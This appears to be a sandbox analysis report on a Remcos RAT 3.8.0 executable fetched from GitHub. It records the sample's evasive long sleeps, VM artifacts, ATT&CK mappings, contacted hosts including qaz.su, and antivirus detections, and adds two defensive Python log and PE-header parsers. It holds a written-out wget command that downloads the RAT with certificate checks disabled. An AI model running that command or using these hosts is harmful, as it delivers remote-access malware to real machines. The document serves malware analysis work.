    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\wget.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Static PE information: 0xFB168D89 [Fri Jun 29 11:20:41 2103 UTC] source: Remcos-RAT-3.8.0.exe.2.dr
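The "suspicious time stamp" row above is a PE TimeDateStamp of 0xFB168D89, which decodes to the year 2103. On its own that is weak evidence of tampering for this sample: it is a .NET assembly (ReversingLabs labels it ByteCode-MSIL and it loads mscorrc.dll), and the Roslyn compiler's deterministic-build option, the default in current Visual Studio and SDK projects, writes a hash of the build inputs into that field rather than a date. The script below is an added example, not part of the sandbox report or of any tool it used: it parses the COFF header for the stamp, checks the CLR data directory to tell .NET images from native ones, and reports the stamp with that caveat. The header fixture it builds is constructed for the demonstration, and the plausibility window (after 1995, not more than a day in the future) is an assumption of this example, not a sandbox rule.

```python
"""Read a PE TimeDateStamp and judge whether it is plausible, with the .NET caveat.

Added example, not part of the sandbox report. build_minimal_pe() produces a
constructed header fixture, not the analysed sample.
"""
import datetime as dt
import struct

EPOCH = dt.datetime(1970, 1, 1, tzinfo=dt.timezone.utc)
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14  # data-directory slot of the CLR header


def build_minimal_pe(timestamp: int, clr_rva: int = 0) -> bytes:
    """Constructed PE32 header fixture: DOS stub + COFF header + optional header, no sections."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    num_dirs = 16
    opt_size = 96 + 8 * num_dirs  # PE32: 96 bytes of fixed fields + 16 data directories
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 92, num_dirs)              # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR,
                     clr_rva, 0x48 if clr_rva else 0)      # CLR header RVA / size
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def read_pe_header(data: bytes) -> dict:
    """Extract TimeDateStamp and whether a CLR (.NET) header directory is present."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine, _nsec, timestamp, _, _, _opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32
        ndirs_off, dirs_off = 92, 96
    elif magic == 0x20B:      # PE32+
        ndirs_off, dirs_off = 108, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]
    clr_rva = 0
    if ndirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
        clr_rva = struct.unpack_from(
            "<I", data, opt + dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)[0]
    return {"machine": machine, "timestamp": timestamp, "is_dotnet": clr_rva != 0}


def assess_timestamp(timestamp: int, is_dotnet: bool, now: dt.datetime) -> dict:
    """Classify the stamp; on .NET images an impossible date is often a deterministic-build hash."""
    when = EPOCH + dt.timedelta(seconds=timestamp)
    if timestamp == 0:
        verdict = "zeroed"
    elif when > now + dt.timedelta(days=1):
        verdict = "future"
    elif when < dt.datetime(1995, 1, 1, tzinfo=dt.timezone.utc):  # assumed lower bound
        verdict = "implausibly old"
    else:
        verdict = "plausible"
    note = ""
    if verdict != "plausible" and is_dotnet:
        # Roslyn /deterministic stores a hash of the build inputs in TimeDateStamp,
        # so a bogus date is expected on modern .NET builds and is weak evidence alone.
        note = "CLR header present: value may be a deterministic-build hash, not a forged date"
    return {"utc": when.isoformat(), "verdict": verdict, "note": note}


def analyze(data: bytes, now: dt.datetime) -> dict:
    hdr = read_pe_header(data)
    return {**hdr, **assess_timestamp(hdr["timestamp"], hdr["is_dotnet"], now)}


# Constructed fixtures: the report's stamp (0xFB168D89) in a .NET-style header, and a
# native-style header stamped in November 2023. The reference date is the analysis date.
ANALYSIS_DATE = dt.datetime(2025, 3, 20, tzinfo=dt.timezone.utc)
DOTNET_SAMPLE = build_minimal_pe(0xFB168D89, clr_rva=0x2008)
NATIVE_SAMPLE = build_minimal_pe(1700000000)

if __name__ == "__main__":
    for name, blob in (("dotnet", DOTNET_SAMPLE), ("native", NATIVE_SAMPLE)):
        print(name, analyze(blob, ANALYSIS_DATE))
```

For a real file, pass `open(path, "rb").read()` to `analyze()`; for a .NET sample the stamp should be weighed together with the PDB path and the absence of an Authenticode signature rather than treated as proof of timestomping by itself.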
File created: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe source: C:\Windows\SysWOW64\wget.exe
Process information set: NOOPENFILEERRORBOX (47 identical rows) source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical rows) source: C:\Windows\SysWOW64\WerFault.exe
Process information set: NOOPENFILEERRORBOX (51 identical rows) source: C:\Windows\SysWOW64\WerFault.exe
Memory allocated: F20000 memory reserve | memory write watch source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Memory allocated: 2C30000 memory reserve | memory write watch source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Memory allocated: 29E0000 memory reserve | memory write watch source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 922337203685477 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 600000 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 599871 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 599750 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 599442 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 598969 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 598798 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 598672 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 598563 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 595841 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 595715 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Window / User API: threadDelayed 451 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Window / User API: threadDelayed 755 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread sleep time: -5534023222112862s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Thread sleep time: -600000s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Thread sleep count: 451 > 30 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8540
Thread sleep time: -599871s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Thread sleep time: -599750s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Thread sleep time: -599442s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Thread sleep time: -598969s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Thread sleep time: -598798s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Thread sleep count: 755 > 30 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8540
Thread sleep time: -598672s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Thread sleep time: -598563s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Thread sleep time: -595841s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Thread sleep time: -595715s >= -30000s source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8536
Last function: Thread delayed source: C:\Windows\System32\conhost.exe
Thread delayed: delay time: 922337203685477 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 600000 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 599871 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 599750 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 599442 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 598969 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 598798 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 598672 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 598563 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 595841 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Thread delayed: delay time: 595715 source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
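The rows from "Process information set" down to the last "Thread delayed" are what the report's "Contains long sleeps (>= 3 min)" and "May sleep (evasive loops)" signatures are built from: dozens of identical SetErrorMode rows and a series of ten-minute delays (600000 ms and slightly shorter re-observations) plus one delay of 922337203685477 ms, which is 2^63-1 in 100-nanosecond ticks, the largest interval a signed 64-bit timeout can hold and therefore an indefinite wait. The script below is an added example, not part of the report or of the sandbox's own tooling: it parses rows in the flattened "Source: <process><Label>: <value>Jump to behavior" form seen on this page, collapses identical rows into counts, and classifies the delays against the report's own three-minute threshold. The label list and the sample rows are constructed from this report; the 3-minute and "infinite" cut-offs are assumptions of the example.

```python
"""Parse flattened Joe Sandbox behaviour rows and summarise sleeps and SetErrorMode calls.

Added example, not part of the report. SAMPLE is a constructed subset of the rows
shown above; the label list below is an assumption covering only those row types.
"""
import ntpath
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Tuple

LABELS = ("Process information set", "Thread delayed", "Thread sleep time", "Thread sleep count",
          "Memory allocated", "Window / User API", "Section loaded", "File created", "File opened",
          "Key value queried", "Last function", "Binary or memory string")
ROW_RE = re.compile(
    r"^Source: (?P<source>.+?)(?: TID: (?P<tid>\d+))?"
    r"(?P<label>" + "|".join(re.escape(label) for label in LABELS) + r"): ?"
    r"(?P<value>.*?)(?:Jump to behavior|Jump to dropped file)?$")

# 2^63-1 ticks of 100 ns expressed in milliseconds: 922337203685477 (.NET TimeSpan.MaxValue)
DOTNET_TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 3 * 60 * 1000  # the report's ">= 3 min" long-sleep threshold (assumed)


@dataclass
class Row:
    source: str
    tid: str
    label: str
    value: str


def parse_rows(text: str) -> List[Row]:
    """Split each fused row into process, thread id, label and value; skip unknown rows."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(Row(m["source"], m["tid"] or "", m["label"], m["value"]))
    return rows


def count_events(rows: List[Row]) -> Counter:
    """Collapse identical (process, label, value) rows into counts, e.g. 47 x NOOPENFILEERRORBOX."""
    return Counter((ntpath.basename(r.source), r.label, r.value) for r in rows)


def classify_delay(ms: int) -> str:
    if ms >= DOTNET_TIMESPAN_MAX_MS:
        return "infinite"   # largest 64-bit 100 ns interval: the thread parks itself
    if ms >= LONG_SLEEP_MS:
        return "long"       # beyond the three-minute evasion threshold
    return "short"


def summarize_sleeps(rows: List[Row]) -> Dict[str, int]:
    """Count delays per class and total the finite ones (an infinite wait would swamp the sum)."""
    delays = []
    for r in rows:
        if r.label == "Thread delayed":
            m = re.search(r"delay time: (\d+)", r.value)
            if m:
                delays.append(int(m.group(1)))
    classes = Counter(classify_delay(d) for d in delays)
    finite = [d for d in delays if classify_delay(d) != "infinite"]
    return {"infinite": classes["infinite"], "long": classes["long"], "short": classes["short"],
            "finite_total_ms": sum(finite), "longest_finite_ms": max(finite, default=0)}


# Constructed sample: a subset of the rows above, in the flattened extraction format.
SAMPLE = r"""
Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeFile created: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeJump to dropped file
Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exeThread delayed: delay time: 599871Jump to behavior
Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe TID: 8540Thread sleep count: 451 > 30Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
"""

if __name__ == "__main__":
    parsed = parse_rows(SAMPLE)
    for key, n in count_events(parsed).most_common():
        print(n, key)
    print(summarize_sleeps(parsed))
```

Run over the full row list, the counts reproduce the collapsed figures in this section (47 and 51 SetErrorMode rows) and the sleep summary shows why the sandbox stopped while the process slept: every finite delay is a long one and one wait never returns.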
Note: Amcache.hve.6.dr is a copy of the system's Amcache registry hive written by the WerFault.exe crash-report process, not a file produced by the sample. The VMware and Hyper-V strings below therefore describe the analysis VM itself and are not evidence that the sample reads or compares them.
Binary or memory string: VMware source: Amcache.hve.6.dr
Binary or memory string: VMware Virtual USB Mouse source: Amcache.hve.6.dr
Binary or memory string: vmci.syshbin source: Amcache.hve.6.dr
Binary or memory string: VMware, Inc. source: Amcache.hve.6.dr
Binary or memory string: VMware20,1hbin@ source: Amcache.hve.6.dr
Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 source: Amcache.hve.6.dr
Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 source: Amcache.hve.6.dr
Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys source: Amcache.hve.6.dr
Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 source: Amcache.hve.6.dr
Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev source: Amcache.hve.6.dr
Binary or memory string: c:/windows/system32/drivers/vmci.sys source: Amcache.hve.6.dr
Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 source: Amcache.hve.6.dr
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll source: wget.exe, 00000002.00000002.1321859775.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400375747.000000000109B000.00000004.00000020.00020000.00000000.sdmp
Binary or memory string: VMware Virtual RAMX source: Amcache.hve.6.dr
Binary or memory string: vmci.sys source: Amcache.hve.6.dr
Binary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93 source: Amcache.hve.6.dr
Binary or memory string: vmci.syshbin` source: Amcache.hve.6.dr
Binary or memory string: \driver\vmci,\driver\pci source: Amcache.hve.6.dr
Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 source: Amcache.hve.6.dr
Binary or memory string: VMware20,1 source: Amcache.hve.6.dr
Binary or memory string: Microsoft Hyper-V Generation Counter source: Amcache.hve.6.dr
Binary or memory string: NECVMWar VMware SATA CD00 source: Amcache.hve.6.dr
Binary or memory string: VMware Virtual disk SCSI Disk Device source: Amcache.hve.6.dr
Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom source: Amcache.hve.6.dr
Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk source: Amcache.hve.6.dr
Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver source: Amcache.hve.6.dr
Binary or memory string: VMware PCI VMCI Bus Device source: Amcache.hve.6.dr
Binary or memory string: VMware VMCI Bus Device source: Amcache.hve.6.dr
Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 source: Amcache.hve.6.dr
Binary or memory string: vmci.inf_amd64_68ed49469341f563 source: Amcache.hve.6.dr
Process information queried: ProcessInformation source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Process queried: DebugPort (2 identical rows) source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Process token adjusted: Debug source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Memory allocated: page read and write | page guard source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe

HIPS / PFW / Operating System Protection Evasion

File source: Process Memory Space: Remcos-RAT-3.8.0.exe PID: 8472, type: MEMORYSTR source: Yara match
Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://github.com/ox47100/remcos-rat-v3.8.0/raw/refs/heads/main/remcos-rat-3.8.0.exe" > cmdline.out 2>&1 source: unknown
Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://github.com/ox47100/remcos-rat-v3.8.0/raw/refs/heads/main/remcos-rat-3.8.0.exe" source: C:\Windows\SysWOW64\cmd.exe
Note: the sandbox lower-cases command lines in this section, which changes the meaning of wget's case-sensitive options. As issued, the options are -T 60 (network timeout) and -P (directory prefix); wget's lower-case -t is the retry count (already given as -t 2) and -p fetches page requisites. This cmd.exe / wget.exe / conhost.exe chain with its output redirected to cmdline.out is the sandbox's own URL-download harness, so the "Ingress Tool Transfer", web-request and missing-user-agent findings stem from it rather than from the sample.
Queries volume information: C:\Users\user\Desktop\download VolumeInformation source: C:\Windows\SysWOW64\wget.exe
Queries volume information: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe VolumeInformation source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid source: C:\Windows\SysWOW64\wget.exe
Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe source: Amcache.hve.6.dr
Binary or memory string: msmpeng.exe source: Amcache.hve.6.dr
Binary or memory string: c:\program files\windows defender\msmpeng.exe source: Amcache.hve.6.dr
Binary or memory string: MsMpEng.exe source: Amcache.hve.6.dr
Note: the four Defender (MsMpEng.exe) strings behind the "AV process strings found" signature also come from the Amcache hive collected by WerFault.exe, so they record that Defender ran on the analysis host, not that the sample carries AV process names.
MITRE ATT&CK matrix, one line per tactic. A number in parentheses is the count the sandbox shows for that technique in this analysis; entries without a number are the matrix template and were not observed.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (41); Process Injection (1); Timestomp (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (121); Process Discovery (1); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); System Information Discovery (12); Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior graph (ID 1644538; URL https://github.com/Ox47100/...; start date 20/03/2025; architecture WINDOWS; score 72), rendered as text:
Resolved hosts: raw.githubusercontent.com, qaz.su, github.com
Signatures attached to the analysis root: Yara detected Powershell download and execute; Sigma detected: Invoke-Obfuscation CLIP+ Launcher; Sigma detected: Invoke-Obfuscation VAR+ Launcher
cmd.exe started (graph badge 2), which started wget.exe (badge 2) and conhost.exe
    wget.exe contacted github.com 140.82.114.4 port 443 (local port 49722; AS GITHUB, US; United States) and raw.githubusercontent.com 185.199.110.133 port 443 (local port 49723; AS FASTLY, US; Netherlands)
    wget.exe dropped C:\Users\user\...\Remcos-RAT-3.8.0.exe (PE32)
Remcos-RAT-3.8.0.exe started (graph badges 15 and 4)
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
    Contacted qaz.su 80.87.203.251 port 443 (local ports 49724 and 49725; AS THEFIRST-AS, RU; Russian Federation)
    Started WerFault.exe (graph badges 22 and 16), i.e. the sample crashed

Source | Detection | Scanner | Label
https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe | 0% | Avira URL Cloud | safe

Source | Detection | Scanner | Label
C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | 100% | Avira | HEUR/AGEN.1313721
C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.RealProtectPENGSD

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://qaz.su | 0% | Avira URL Cloud | safe
http://qaz.im | 0% | Avira URL Cloud | safe
https://qaz.su/style.css?v=2 | 0% | Avira URL Cloud | safe
https://qaz.su/disclaimer | 0% | Avira URL Cloud | safe
https://qaz.su/index.php?a=download&q=file_not_exist | 0% | Avira URL Cloud | safe
https://qaz.su/index.php?a=admin | 0% | Avira URL Cloud | safe
http://qaz.sud | 0% | Avira URL Cloud | safe
https://qaz.su/load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06 | 0% | Avira URL Cloud | safe
https://qaz.su/js/jquery.js | 0% | Avira URL Cloud | safe
http://microsoft.coCn | 0% | Avira URL Cloud | safe
https://qaz.su/privacy | 0% | Avira URL Cloud | safe
https://qaz.su/favicon.ico | 0% | Avira URL Cloud | safe
https://qaz.su/ | 0% | Avira URL Cloud | safe
https://qaz.su/js/jquery-1.12.4.min.js | 0% | Avira URL Cloud | safe
https://qaz.su/index.php?a=user | 0% | Avira URL Cloud | safe
https://qaz.su/tos | 0% | Avira URL Cloud | safe
http://qaz.is | 0% | Avira URL Cloud | safe
https://qaz.su/contact | 0% | Avira URL Cloud | safe
https://qaz.su/js/jquery.tipsy.js | 0% | Avira URL Cloud | safe
https://qaz.su | 0% | Avira URL Cloud | safe
https://qaz.su/css/font-awesome.css | 0% | Avira URL Cloud | safe


    NameIPActiveMaliciousAntivirus DetectionReputation
    qaz.su
    80.87.203.251
    truefalse
      unknown
      github.com
      140.82.114.4
      truefalse
        high
        raw.githubusercontent.com
        185.199.110.133
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exefalse
            high
            https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exefalse
              high
              https://qaz.su/load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06false
              • Avira URL Cloud: safe
              unknown
              https://qaz.su/index.php?a=download&q=file_not_existfalse
              • Avira URL Cloud: safe
              unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://qaz.su | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://qaz.im | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exeT | wget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://qaz.su/disclaimer | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.6.dr | false | | high
https://qaz.su/style.css?v=2 | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3. | wget.exe, 00000002.00000002.1321859775.0000000000B78000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exeta | wget.exe, 00000002.00000002.1321812511.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://qaz.su/js/jquery.js | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://microsoft.coCn | Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.0000000006210000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://qaz.sud | Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
